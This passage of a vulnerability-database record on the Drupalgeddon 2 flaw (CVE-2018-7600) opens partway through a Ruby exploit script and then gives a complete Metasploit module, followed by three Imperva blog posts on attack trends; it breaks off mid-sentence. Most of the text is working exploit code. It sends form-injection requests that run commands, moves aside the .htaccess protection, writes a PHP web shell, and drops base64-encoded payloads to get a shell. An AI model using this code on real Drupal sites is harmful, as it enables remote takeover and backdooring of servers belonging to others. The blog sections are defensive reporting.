}.join\n url, payload = gen_evil_url(\"echo #{random}\", e)\n\n response = http_request(url, \"post\", payload, $session_cookie)\n if (response.code == \"200\" or response.code == \"500\") and not response.body.empty?\n result = clean_result(response.body)\n if not result.empty?\n puts success(\"Result : #{result}\")\n\n if response.body.match(/#{random}/)\n puts success(\"Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\")\n break\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [4]... Detected output, but didn't MATCH expected result\")\n end\n\n else\n puts warning(\"WARNING: Target MIGHT be exploitable [3] (HTTP Response: #{response.code})... Didn't detect any INJECTED output (disabled PHP function?)\")\n end\n\n puts warning(\"WARNING: Target MIGHT be exploitable [5]... Blind attack?\") if response.code == \"500\"\n\n puts verbose(\"response.body: #{response.body}\") if $verbose\n puts verbose(\"clean_result: #{result}\") if not result.empty? and $verbose\n\n elsif response.body.empty?\n puts error(\"Target is NOT exploitable [2] (HTTP Response: #{response.code})... Got an empty response\")\n exit\n\n else\n puts error(\"Target is NOT exploitable [1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n exit\n end\n\n puts \"- \"*40 if e != elements.last\nend\n\nputs \"-\"*80\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n# Location of web shell & used to signal if using PHP shell\nwebshellpath = \"\"\nprompt = \"drupalgeddon2\"\n\n# Possibles paths to try\npaths = [\n # Web root\n \"\",\n # Required for setup\n \"sites/default/\",\n \"sites/default/files/\",\n # They did something \"wrong\", chmod -R 0777 .\n #\"core/\",\n]\n# Check all (if doing web shell)\npaths.each do|path|\n # Check to see if there is already a file there\n puts action(\"Testing: Existing file (#{$target}#{path}#{webshell})\")\n\n response = http_request(\"#{$target}#{path}#{webshell}\", 'get', '', $session_cookie)\n if response.code == \"200\"\n puts warning(\"Response: HTTP #{response.code} // Size: #{response.size}. ***Something could already be there?***\")\n else\n puts info(\"Response: HTTP #{response.code} // Size: #{response.size}\")\n end\n\n puts \"- \"*40\n\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n folder = path.empty? ? \"./\" : path\n puts action(\"Testing: Writing To Web Root (#{folder})\")\n\n # Merge locations\n webshellpath = \"#{path}#{webshell}\"\n\n # Final command to execute\n cmd = \"#{bashcmd} | tee #{webshellpath}\"\n\n # By default, Drupal v7.x disables the PHP engine using: ./sites/default/files/.htaccess\n # ...however, Drupal v8.x disables the PHP engine using: ./.htaccess\n if path == \"sites/default/files/\"\n puts action(\"Moving : ./sites/default/files/.htaccess\")\n cmd = \"mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}\"\n end\n\n # Generate evil URLs\n url, payload = gen_evil_url(cmd, $element)\n # Make the request\n response = http_request(url, \"post\", payload, $session_cookie)\n # Check result\n if response.code == \"200\" and not response.body.empty?\n # Feedback\n result = clean_result(response.body)\n puts success(\"Result : #{result}\") if not result.empty?\n\n # Test to see if backdoor is there (if we managed to write it)\n response = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=hostname\", $session_cookie)\n if response.code == \"200\" and not response.body.empty?\n puts success(\"Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [2-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [2-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [2-2] (HTTP Response: #{response.code})... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [2-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n elsif response.code == \"500\" and not response.body.empty?\n puts warning(\"Target MAY of been exploited... Bit of blind leading the blind\")\n break\n\n elsif response.code == \"404\"\n puts warning(\"Target is NOT exploitable [1-4] (HTTP Response: #{response.code})... Might not have write access?\")\n\n elsif response.code == \"403\"\n puts warning(\"Target is NOT exploitable [1-3] (HTTP Response: #{response.code})... May not be able to execute PHP from here?\")\n\n elsif response.body.empty?\n puts warning(\"Target is NOT exploitable [1-2] (HTTP Response: #{response.code}))... Got an empty response back\")\n\n else\n puts warning(\"Target is NOT exploitable [1-1] (HTTP Response: #{response.code})\")\n puts verbose(\"response.body: #{response.body}\") if $verbose\n end\n\n webshellpath = \"\"\n\n puts \"- \"*40 if path != paths.last\nend if try_phpshell\n\n# If a web path was set, we exploited using PHP!\nif not webshellpath.empty?\n # Get hostname for the prompt\n prompt = response.body.to_s.strip if response.code == \"200\" and not response.body.empty?\n\n puts \"-\"*80\n puts info(\"Fake PHP shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'\")\n# Should we be trying to call commands via PHP?\nelsif try_phpshell\n puts warning(\"FAILED : Couldn't find a writeable web path\")\n puts \"-\"*80\n puts action(\"Dropping back to direct OS commands\")\nend\n\n\n# Stop any CTRL + C action ;)\ntrap(\"INT\", \"SIG_IGN\")\n\n\n# Forever loop\nloop do\n # Default value\n result = \"~ERROR~\"\n\n # Get input\n command = Readline.readline(\"#{prompt}>> \", true).to_s\n\n # Check input\n puts warning(\"WARNING: Detected an known bad character (>)\") if command =~ />/\n\n # Exit\n break if command == \"exit\"\n\n # Blank link?\n next if command.empty?\n\n # If PHP web shell\n if not webshellpath.empty?\n # Send request\n result = http_request(\"#{$target}#{webshellpath}\", \"post\", \"c=#{command}\", $session_cookie).body\n # Direct OS commands\n else\n url, payload = gen_evil_url(command, $element, true)\n response = http_request(url, \"post\", payload, $session_cookie)\n\n # Check result\n if not response.body.empty?\n result = clean_result(response.body)\n end\n end\n\n # Feedback\n puts result\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-04T06:57:01", "description": "This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n", "cvss3": {}, "published": "2018-04-14T05:22:30", "type": "metasploit", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Drupal\n # XXX: CmdStager can't handle badchars\n include Msf::Exploit::PhpEXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\n 'Description' => %q{\n This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n },\n 'Author' => [\n 'Jasper Mattsson', # Vulnerability discovery\n 'a2u', # Proof of concept (Drupal 8.x)\n 'Nixawk', # Proof of concept (Drupal 8.x)\n 'FireFart', # Proof of concept (Drupal 7.x)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-7600'],\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\n ['URL', 'https://github.com/FireFart/CVE-2018-7600']\n ],\n 'DisclosureDate' => '2018-03-28',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'linux'],\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Payload' => {'BadChars' => '&>\\''},\n 'Targets' => [\n #\n # Automatic targets (PHP, cmd/unix, native)\n #\n ['Automatic (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_memory\n ],\n ['Automatic (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_dropper\n ],\n ['Automatic (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Automatic (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 7.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 7.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_memory\n ],\n ['Drupal 7.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_dropper\n ],\n ['Drupal 7.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :unix_memory\n ],\n ['Drupal 7.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('7'),\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 8.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 8.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_memory\n ],\n ['Drupal 8.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_dropper\n ],\n ['Drupal 8.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :unix_memory\n ],\n ['Drupal 8.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('8'),\n 'Type' => :linux_dropper\n ]\n ],\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\n 'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts\n 'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}\n ))\n\n register_options([\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\n OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\n ])\n end\n\n def check\n checkcode = CheckCode::Unknown\n\n @version = target['Version'] || drupal_version\n\n unless @version\n vprint_error('Could not determine Drupal version to target')\n return checkcode\n end\n\n vprint_status(\"Drupal #{@version} targeted at #{full_uri}\")\n checkcode = CheckCode::Detected\n\n changelog = drupal_changelog(@version)\n\n unless changelog\n vprint_error('Could not determine Drupal patch level')\n return checkcode\n end\n\n case drupal_patch(changelog, 'SA-CORE-2018-002')\n when nil\n vprint_warning('CHANGELOG.txt no longer contains patch level')\n when true\n vprint_warning('Drupal appears patched in CHANGELOG.txt')\n checkcode = CheckCode::Safe\n when false\n vprint_good('Drupal appears unpatched in CHANGELOG.txt')\n checkcode = CheckCode::Appears\n end\n\n # NOTE: Exploiting the vuln will move us from \"Safe\" to Vulnerable\n token = rand_str\n res = execute_command(token, func: 'printf')\n\n return checkcode unless res\n\n if res.body.start_with?(token)\n vprint_good('Drupal is vulnerable to code execution')\n checkcode = CheckCode::Vulnerable\n end\n\n checkcode\n end\n\n def exploit\n unless @version\n print_warning('Targeting Drupal 7.x as a fallback')\n @version = Rex::Version.new('7')\n end\n\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\n # XXX: Naughty datastore modification\n datastore['DUMP_OUTPUT'] = true\n end\n\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\n case target['Type']\n when :php_memory\n execute_command(payload.encoded, func: 'assert')\n\n sleep(wfs_delay)\n return if session_created?\n\n # XXX: This will spawn a *very* obvious process\n execute_command(\"php -r '#{payload.encoded}'\")\n when :unix_memory\n execute_command(payload.encoded)\n when :php_dropper, :linux_dropper\n dropper_assert\n\n sleep(wfs_delay)\n return if session_created?\n\n dropper_exec\n end\n end\n\n def dropper_assert\n php_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{rand_str}.php\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # Stage 1 decodes the PHP and writes it to disk\n stage1 = %Q{\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\n }\n\n # Stage 2 executes said PHP in-process\n stage2 = %Q{\n include_once(\"#{php_file}\");\n }\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Hopefully pop our shell with assert()\n execute_command(stage1.strip, func: 'assert')\n execute_command(stage2.strip, func: 'assert')\n end\n\n def dropper_exec\n php_file = \"#{rand_str}.php\"\n tmp_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{php_file}\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Write the payload or dropper to disk (!)\n # NOTE: Analysis indicates > is a badchar for 8.x\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\n\n # Attempt in-process execution of our PHP script\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, php_file)\n )\n\n sleep(wfs_delay)\n return if session_created?\n\n # Try to get a shell with PHP CLI\n execute_command(\"php #{php_file}\")\n\n sleep(wfs_delay)\n return if session_created?\n\n register_file_for_cleanup(tmp_file)\n\n # Fall back on our temp file\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\n execute_command(\"php #{tmp_file}\")\n end\n\n def execute_command(cmd, opts = {})\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\n\n vprint_status(\"Executing with #{func}(): #{cmd}\")\n\n res =\n case @version.to_s\n when /^7\\b/\n exploit_drupal7(func, cmd)\n when /^8\\b/\n exploit_drupal8(func, cmd)\n end\n\n return unless res\n\n if res.code == 200\n print_line(res.body) if datastore['DUMP_OUTPUT']\n else\n print_error(\"Unexpected reply: #{res.inspect}\")\n end\n\n res\n end\n\n def exploit_drupal7(func, code)\n vars_get = {\n 'q' => 'user/password',\n 'name[#post_render][]' => func,\n 'name[#markup]' => code,\n 'name[#type]' => 'markup'\n }\n\n vars_post = {\n 'form_id' => 'user_pass',\n '_triggering_element_name' => 'name'\n }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n\n return res unless res && res.code == 200\n\n form_build_id = res.get_html_document.at(\n '//input[@name = \"form_build_id\"]/@value'\n )\n\n return res unless form_build_id\n\n vars_get = {\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\n }\n\n vars_post = {\n 'form_build_id' => form_build_id.value\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def exploit_drupal8(func, code)\n # Clean URLs are enabled by default and \"can't\" be disabled\n uri = normalize_uri(target_uri.path, 'user/register')\n\n vars_get = {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => 1,\n '_wrapper_format' => 'drupal_ajax'\n }\n\n vars_post = {\n 'form_id' => 'user_register_form',\n '_drupal_ajax' => 1,\n 'mail[#type]' => 'markup',\n 'mail[#post_render][]' => func,\n 'mail[#markup]' => code\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2018-04-27T04:45:34", "description": "Ever since March 28th, when Drupal published a patch for a RCE named Drupalgeddon 2.0 (SA-CORE-2018-002/[CVE-2018-7600](<https://www.drupal.org/sa-core-2018-002>)), Imperva has been monitoring our cloud looking for hackers\u2019 attempts to exploit the vulnerability, but found nothing. Until today.\n\nIt somehow seems fitting that nefarious activity picked up today, Friday the 13th. After a [POC exploit](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) was released, our monitoring services showed that hackers are finally starting to catch up! Since the RCE exploit was publicly disclosed two weeks ago, they could have been working on their own exploits, but didn\u2019t.\n\n## Lazy Hackers\n\nAs usual when exploits become known, we go into hyper-awareness mode looking for security events (and of course, protecting our customers), but no events were identified. Not a single attack. We rang to some of our teammates looking for answers, asking if they deleted events, but no\u2014it\u2019s just simply that no one attempted to exploit this newfound bug and it took them two whole weeks to reverse the patch.\n\nIt appeared every one of the black hats was waiting for someone else to do the research and share the exploit. Perhaps most hackers don\u2019t care for the actual work of finding ways to exploit a vulnerability. They just wait until something is public and then use it to attack. Before that, we saw almost no traffic whatsoever!\n\n## Attack Data\n\nThe chart below is just the beginning of the numbers we\u2019re now seeing in our cloud, and they are continuing to rise (Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-date.png>)\n\n_Figure 1: Attacks by date_\n\nTo this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets (Figure 2).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-distribution-type.png>)\n\n_Figure 2: Attacks by distribution type_\n\nAlso, most of the attacks originated from the US (53%) and China (45%) (Figure 3).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-geo.png>)\n\n_Figure 3: Location source of attacks_\n\n## Imperva Customers Protected\n\nWe applied a virtual patch to Imperva SecureSphere and Incapsula WAF customers within hours of identifying the RCE vulnerability.\n\nIn addition to our zero-day protection rules that spotted this attack, we also published a new dedicated security rule to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-13T19:13:25", "type": "impervablog", "title": "Drupalgeddon 2.0: Are Hackers Slacking Off?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T19:13:25", "id": "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "href": "https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-13T21:29:37", "description": "\n\nAttacks on applications can be divided into two types: targeted attacks and \u201cspray and pray\u201d attacks. Targeted attacks require planning and usually include a reconnaissance phase, where attackers learn all they can about the target organization\u2019s IT stack and application layers. Targeted application attacks are vastly outnumbered by spray and pray attacks. The perpetrators of spray and pray attacks are less discriminating about their victims. Their goal is to find and steal anything that can be leveraged or [sold on the dark web](<https://medium.com/beyond-the-perimeter/over-750-000-debit-and-credit-cards-for-sale-found-on-the-deep-web-434e050ac59f>). Sometimes spray and pray attacks are used for reconnaissance, and later develop into a targeted attack. \n\nOne famous wave of spray and pray attacks took place against Drupal, the popular open-source content management system (CMS). In March 2018, Drupal reported a highly critical vulnerability ([CVE-2018-7600](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600>)) that earned the nickname, Drupalgeddon 2. This vulnerability enables an attacker to run arbitrary code on common Drupal versions, affecting millions of websites. Tools exploiting this weakness became [widely available](<https://github.com/dreadlocked/Drupalgeddon2>), which caused the [number of attacks on Drupal sites to explode](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>).\n\nThe ability to identify spray and pray attacks is an important insight for security personnel. It can help them prioritize which attacks to investigate, evaluate the true risk to their application, and/or identify a sniffing attack that could be a precursor to a more serious targeted one.\n\n**Identifying Spray and Pray Attacks in Attack Analytics **\n\n[Attack Analytics](<https://www.imperva.com/products/attack-analytics/>), launched in May 2018, aims to crush the maddening pace of alerts that security teams receive. For security analysts unable to triage this alert avalanche, Attack Analytics condenses thousands upon thousands of alerts into a handful of relevant, investigate-able incidents. Powered by artificial intelligence, Attack Analytics automates what would take a team of security analysts days to investigate and cuts that investigation time down to a matter of minutes.\n\nWe recently updated Attack Analytics to provide a list of spray and pray attacks that may hit your business as part of a larger campaign. We researched these attacks using crowdsourced attack data gathered with permission from our customers. This insight is now presented in our Attack Analytics dashboard, as can be seen in the red circled portion of Figure 1 below. \n\n_Figure 1: Attack Analytics Dashboard_\n\nClicking on the Similar Incidents Insights section shows more detail on the related attacks (Figure 2). An alternative way to get the list of spray and pray incidents potentially affecting the user is to login to the console and use the \u201cHow common\u201d filter.\n\n_Figure 2: Attack Analytics Many Customers Filter_\n\n \n\nA closer view of the incidents will tell you the common attributes of the attack affecting other users (Figure 3).\n\n_Figure 3: Attack Analytics Incident Insights_\n\n**How Our Algorithm Works**\n\nThe algorithm that identifies spray and pray attacks examines incidents across Attack Analytics customers. When there are similar incidents across a large number of customers in a close amount of time, we identify this as a likely spray and pray attack originating from the same source. Determining the similarity of incidents requires domain knowledge, and is based on a combination of factors, such as:\n\n * The attack source: Network source (IP/Subnet), Geographic location\n * The attack target: URL, Host, Parameters\n * The attack time: Duration, Frequency\n * The attack type: Triggered rule\n * The attack tool: Tool name, type & parameters \n\nIn some spray and pray attacks, the origin of the attack is the most valuable piece of information connecting multiple incidents. When it is a distributed attack, the origin of the attack is not relevant, while other factors are relevant. In many cases, a spray and pray attack will be aimed at the same group of URLs.\n\nAnother significant common factor is the attack type, in particular, a similar set of rules that were violated in the Web Application Firewall (WAF). Sometimes, the same tools are observed, or the tools belong to the same type of attacks. The time element is also key, especially the duration of the attack or the frequency.\n\n**Results and Findings**\n\nThe Attack Analytics algorithm is designed to identify groups of cross-account incidents. Each group has a set of common features that ties the incidents together. When we reviewed the results and the characteristics of various groupings, we discovered interesting patterns. First, most attacks (83.3%) were common among customers (Figure 4). Second, most attacks (67.4%) belong to groups with single source, meaning the attack came from the same IP address. Third, Bad Bot attacks still have a significant presence (41.1%). In 14.8% of the attacks, a common resource (like a URL) is attacked.\n\n_Figure 4: Spray & Pray Incidents Spread _\n\nHere\u2019s an interesting example - a spray and pray attack from a single IP that attacked 1,368 customers in the same 3 consecutive days with the same vulnerability scanner, LTX71. We\u2019ve also seen Bad Bots illegally accessing resources, attacking from the same subnet located in Illinois using a Trustwave vulnerability scanner. These bots performed a URLs scan on our customers resources - an attack which was blocked by our Web Application Firewall (WAF). Another attack involved a German IP trying to access the same WordPress-created system files on more than 50 different customers with a [cURL](<https://www.hackingarticles.in/web-application-penetration-testing-curl/>). And the list goes on.\n\nFocusing on single-source spray and pray incidents has shown that these attacks affect a significant percentage of our customers. For example, in Figure 5 we see that the leading attack came from one Ukrainian IP that hit at least 18.49% of our customers. Almost every day, one malicious IP would attack a significant percentage of our customers. \n\n_Figure 5: Single Source Spray & Pray Accounts Affected_\n\n**More Actionable Insights Coming**\n\nIdentifying spray and pray attacks is a great example of using the intelligence from Imperva\u2019s customer community to create insights that will help speed up your security investigations. Spray and pray attacks are not the only way of adding insights from community knowledge. Using machine-learning algorithms combined with domain knowledge, we plan to add more security insights like these to our Attack Analytics dashboard in the near future. \n\nThe post [How Imperva's New Attack Crowdsourcing Secures Your Business's Applications](<https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-13T12:52:46", "type": "impervablog", "title": "How Imperva\u2019s New Attack Crowdsourcing Secures Your Business\u2019s Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-02-13T12:52:46", "id": "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "href": "https://www.imperva.com/blog/how-impervas-new-attack-crowdsourcing-secures-your-businesss-applications/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-27T14:50:26", "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. On the content management system (CMS) front, **WordPress vulnerabilities continue to grow, **and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, **Drupal ****vulnerabilities had a larger effect and were used in mass attacks **that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. In the server side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared 